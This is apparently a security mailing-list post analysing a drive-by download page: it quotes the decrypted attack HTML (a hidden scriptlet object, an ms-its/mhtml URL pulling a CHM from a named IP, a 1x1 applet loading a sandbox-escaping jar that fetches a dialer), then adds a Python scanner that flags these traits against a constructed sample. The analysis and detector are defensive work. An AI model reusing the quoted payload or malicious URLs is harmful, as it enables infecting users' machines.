Hi People, before reading this, don't go on any of the sites unless you are sure ;)

After decrypting some stuff, this is the source from: http://xxl-size.com/cogo.html

-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php">
<iframe src="http://www.awmcash.biz/adverts/14/1.htm">
-------------------------------------

This is the source from one of the iframes (http://209.8.20.130/dl/adv346.php):

----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar code=Counter></APPLET></body></html>
----------------------------------------------------

The jar archive loaderadv346.jar contains some Java classes which exploit the URLClassLoader bug (BlackBox.class). It overrides the sandbox and downloads a loadadv346.exe from: http://209.8.20.130/dl/loadadv346.exe

This seems to be a dialer or something like this; it changes the hosts file and creates some spawn files. You can look for yourself, I included the file and the Java stuff. The loadadv is UPX'd.

So far, does anyone know how to protect from this crap? You're welcome to send some solutions ;)

cya,
Stefan
Attachment:
loaderadv.zip
Description: Zip compressed data
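Since the post asks how to protect against pages like this, here is an added example (not code from the post, its attachment, or any of the sites named) of a small static scanner that flags the markup traits the quoted source shows: an `<object>` of type `text/x-scriptlet`, active content tucked inside a `display:none` container, an `ms-its:`/`mhtml:` URL assembled inside a script, a `document.write` that rebuilds hidden markup through a template substitution, a 1x1 applet or iframe, and an iframe that loads from a bare IP address. The sample page below is constructed to mirror the structure of the quoted page; the hosts in it (`203.0.113.10`, `dropper.example.invalid`) are placeholders, not the addresses from the post. Such a scanner is suitable for a proxy, mail gateway or crawler feed; it matches patterns, so it will not catch obfuscated variants, and the indicator list is an assumption of what is worth flagging, not a complete signature set.

```python
"""Static indicator scan for drive-by HTML of the kind quoted in the post above."""
import re

# Constructed sample page mirroring the post's structure; hosts are placeholders,
# not the real addresses from the post.
SAMPLE_HTML = """<html><head></head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\\${PR}/g,'ms-its:mhtml:file://c:\\\\nosuch.mht!http://dropper.example.invalid/x.chm::/x.htm'));
</script>
<iframe src="http://203.0.113.10/dl/adv.php">
<applet width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET></body></html>"""

# Constructed benign page used as a control case.
BENIGN_HTML = """<html><body><h1>Hello</h1>
<iframe src="https://www.example.com/embed" width="600" height="400"></iframe>
</body></html>"""

# Opening tags of elements that can pull in active content.
TAG_RE = re.compile(r"<(applet|iframe|object|embed)\b([^>]*)>", re.I)
# name=value pairs inside a tag; quoted or bare values, as in the quoted applet tag.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
# Containers hidden with display:none and everything up to their closing tag.
HIDDEN_RE = re.compile(r"<(textarea|div|span)\b[^>]*display\s*:\s*none[^>]*>(.*?)</\1\s*>", re.I | re.S)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# URL schemes handed to the HTML Help / MHTML protocol handlers.
SCHEME_RE = re.compile(r"\b(ms-its|mhtml):", re.I)
RAW_IP_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.I)
# document.write(...replace(...)) : markup rebuilt at runtime from a template.
DYN_WRITE_RE = re.compile(r"document\.write\s*\(.*?\.replace\s*\(", re.I | re.S)


def _attrs(raw):
    """Parse a tag's attribute string into a lowercase-keyed dict."""
    return {name.lower(): val.strip("\"'") for name, val in ATTR_RE.findall(raw)}


def _tiny(attrs):
    """True when both width and height are numeric and at most 1 pixel."""
    try:
        return int(attrs.get("width", "")) <= 1 and int(attrs.get("height", "")) <= 1
    except ValueError:
        return False


def scan_html(html):
    """Return a list of human-readable indicators found in the markup."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), _attrs(m.group(2))
        if tag == "object" and attrs.get("type", "").lower() == "text/x-scriptlet":
            findings.append("object with type text/x-scriptlet")
        if tag in ("applet", "iframe") and _tiny(attrs):
            findings.append(f"1x1 {tag}")
        src = attrs.get("src") or attrs.get("data") or ""
        if RAW_IP_RE.match(src):
            findings.append(f"{tag} loads from a bare IP address")
        if SCHEME_RE.search(src):
            findings.append(f"{tag} uses an HTML Help/MHTML URL scheme")
    for m in HIDDEN_RE.finditer(html):
        if TAG_RE.search(m.group(2)):
            findings.append(f"active content inside display:none <{m.group(1).lower()}>")
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if SCHEME_RE.search(body):
            findings.append("HTML Help/MHTML URL scheme in script")
        if DYN_WRITE_RE.search(body):
            findings.append("document.write rebuilds hidden markup with a template substitution")
    return findings


def is_suspicious(html, min_findings=2):
    """Simple scoring: two or more independent indicators mark the page."""
    return len(scan_html(html)) >= min_findings


if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(label, is_suspicious(page), scan_html(page))
```

The threshold of two indicators is a deliberate choice: a lone 1x1 iframe or a bare-IP source shows up on plenty of legitimate tracking pixels and test servers, but a page that combines a hidden scriptlet object with an `ms-its:` URL built in script has no ordinary reason to exist.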